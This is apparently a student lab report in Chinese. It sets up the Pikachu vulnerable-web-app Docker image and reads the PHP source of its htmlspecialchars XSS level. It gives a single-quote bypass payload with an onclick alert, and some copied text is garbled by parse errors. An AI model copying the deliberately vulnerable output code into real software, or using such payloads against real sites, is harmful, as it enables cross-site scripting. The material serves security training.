1/问答题
\1. 使用 docker 构建 pikachu镜像
(1)搜索pikachu
docker search pikachu
(2)拉取镜像
docker pull area39/pikachu
(3)启动pikachu镜像
docker run --name piakchu -d -p 8000:80 area39/pikachu
┌──(root💀pinginglab)-[/home/pinginglab]
└─# docker search pikachu
NAME DESCRIPTION STARS OFFICIAL AUTOMATED
area39/pikachu https://github.com/zhuifengshaonianhanlu/pik… 6
vulfocus/pikachu 1
cyruswireless/pikachu 0
pikachuchu/pythonwebapp_app 0
pikachuchu/pythonwebapp_db 0
pikachuchu/pythonwebapp_lb 0
hirune924/pikachu https://github.com/hirune924/pikachu/blob/ma… 0
pikachust8811/kong 0
pikachust8811/tomcat-web 0
pikachust8811/python36-module 0
pikachust8811/soc 0
cyruswireless/pikachufront 0
amanpunj123/pikachu-datapuller 0
pikachust8811/iii_snort 0
pikachust8811/iii_fluentd 0
santhoshkudva/pikachu-datapuller 0
pikachuhan/pikachu-ci 0
amanpunj123/pikachu-datapuller-1 0
amanpunj123/pikachu-server 0
pikachuhy/node_pm2 0
cyruswireless/pikachulegacyback 0
pikachust8811/python36 0
pikachuking/lara-docker-dev 0
pikachu89/tali-poc 0
pikachudopc/primeirodocker 0
┌──(root💀pinginglab)-[/home/pinginglab]
└─#
┌──(root💀pinginglab)-[/home/pinginglab]
└─# docker pull area39/pikachu
Using default tag: latest
latest: Pulling from area39/pikachu
c64513b74145: Pulling fs layer
01b8b12bad90: Pulling fs layer
c5d85cf7a05f: Pulling fs layer
b6b268720157: Pulling fs layer
e12192999ff1: Pull complete
d39ece66b667: Pull complete
65599be66378: Pull complete
c75fcebdae6f: Pull complete
87b4f02da429: Pull complete
3842c680efa8: Pull complete
9cbd01d2a616: Pull complete
3eaf806e3765: Pull complete
4843096104ad: Pull complete
356abac40837: Pull complete
98a362be1edb: Pull complete
e25f59d389d6: Pull complete
959f6424d70e: Pull complete
7d24ec17af71: Pull complete
8c321ce0469f: Pull complete
bbee4b7ddaaf: Pull complete
208aa50d52d5: Pull complete
5cdb92267944: Pull complete
145bbfa86189: Pull complete
2b4983eea06b: Pull complete
4afb52d803aa: Pull complete
937a4090ac88: Pull complete
159690a20e94: Pull complete
9575fa89c765: Pull complete
604b62c0f613: Pull complete
0b9e08503c76: Pull complete
547ca47d0234: Pull complete
ddfafb750d27: Pull complete
3afc878341b1: Pull complete
f085516d6b0e: Pull complete
0ebf3d66b35d: Pull complete
Digest: sha256:e9748879af76b68235a6ec66ce28b048323ac31f7f33065d83727cacb3998e05
Status: Downloaded newer image for area39/pikachu:latest
docker.io/area39/pikachu:latest
┌──(root💀pinginglab)-[/home/pinginglab]
└─# docker run --name piakchu -d -p 8000:80 area39/pikachu
a3e8853a8e0b92206017a64b10199a68843a311d78462fa98f309636c4c16a0d
成功启用浏览器访问:
\2. 使用 vscode 进入pikachu镜像内部
(1)root用户启动vscode
code --user-data-dir=/root
(2)安装docker插件
(3)利用attach shell进入pikachu内部
通过files访问内部文件
\3. 通过阅读pikachu(XSS之htmlspecialchars)漏洞的源码,找出绕过方法
(1)查阅代码
<?php
/**
* Created by runner.han
* There is nothing new under the sun
*/
$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
if ($SELF_PAGE = "xss_02.php"){
$ACTIVE = array('','','','','','','','active open','','','','','','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}
$PIKA_ROOT_DIR = "../../";
include_once $PIKA_ROOT_DIR.'header.php';
$html='';
$html1='';
$html2='';
if(isset($_GET['submit'])){
if(empty($_GET['message'])){
$html.="<p class='notice'>输入点啥吧!</p>";
}else {
//使用了htmlspecialchars进行处理,是不是就没问题了呢,htmlspecialchars默认不对'处理
$message=htmlspecialchars($_GET['message']);
$html1.="<p class='notice'>你的输入已经被记录:</p>";
//输入的内容被处理后输出到了input标签的value属性里面,试试:' οnclick='alert(111)'
// $html2.="<input class='input' type='text' name='inputvalue' readonly='readonly' value='{$message}' style='margin-left:120px;display:block;background-color:#c0c0c0;border-style:none;'/>";
$html2.="<a href='{$message}'>{$message}</a>";
}
}
?>
<div class="main-content">
<div class="main-content-inner">
<div class="breadcrumbs ace-save-state" id="breadcrumbs">
<ul class="breadcrumb">
<li>
<i class="ace-icon fa fa-home home-icon"></i>
<a href="xss.php">xss</a>
</li>
<li class="active">xss之htmlspecialchars</li>
</ul><!-- /.breadcrumb -->
<a href="#" style="float:right" data-container="body" data-toggle="popover" data-placement="bottom" title="tips(再点一下关闭)"
data-content="先去查一下htmlspecialchars这个方法的含义">
点一下提示~
</a>
</div>
<div class="page-content">
<div id="xssr_main">
<p class="xssr_title">人生之所有苦短,是因为你的xss学习的还不够好</p>
<form method="get">
<input class="xssr_in" type="text" name="message" />
<input class="xssr_submit" type="submit" name="submit" value="submit" />
</form>
<?php
echo $html;
echo $html1;
echo $html2;
?>
</div>
</div><!-- /.page-content -->
</div>
</div><!-- /.main-content -->
<?php
include_once $PIKA_ROOT_DIR.'footer.php';
?>
(2)
htmlspecialchars绕过
htmlspecialchars()函数把预定义字符转换成HT,L实体
预定义字符为:
1、& (和 )&(编码)
2、” (双引号)&qupt
3、’ (单引号)’
4、< (小于) &It
5、> (大于) >
可用引号类型:
ENT_COMPAT—默认,仅编码双引号
ENT_QUOTES—编码双引号和单引号(推荐)
ENT_NOQUOTES—不编码任何引号
我们仍以pikachu为例,打开xss之htmlspecialchars
————————————————
版权声明:本文为CSDN博主「以菜之名」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_44720671/article/details/89666761
<?php
echo $html;
echo $html1;
echo $html2;
?>
(3)
$html1.=“
你的输入已经被记录:
”;//输入的内容被处理后输出到了input标签的value属性里面,试试:’ οnclick=‘alert(111)’
// KaTeX parse error: Expected '}', got 'EOF' at end of input: …donly' value='{message}’ style=‘margin-left:120px;display:block;background-color:#c0c0c0;border-style:none;’/>“;
KaTeX parse error: Expected '}', got 'EOF' at end of input: …l2.="<a href='{message}'>{$message}”;
根据代码可以发现用‘(单引号)绕过value=‘{$message}’
即
<a href=“q” οnclick=“alert(123)” ‘=“”>q’ οnclick=‘alert(123)’
\4. 写出使用的 payload 并截图弹窗效果
使用的payload:
q’ οnclick=‘alert(123)’
编写实验报告时,将整个作业过程中的涉及的步骤、效果、思路等整理为Word或PDF或PPT⽂档并上传,⽂档名称为"姓名-作业名称"。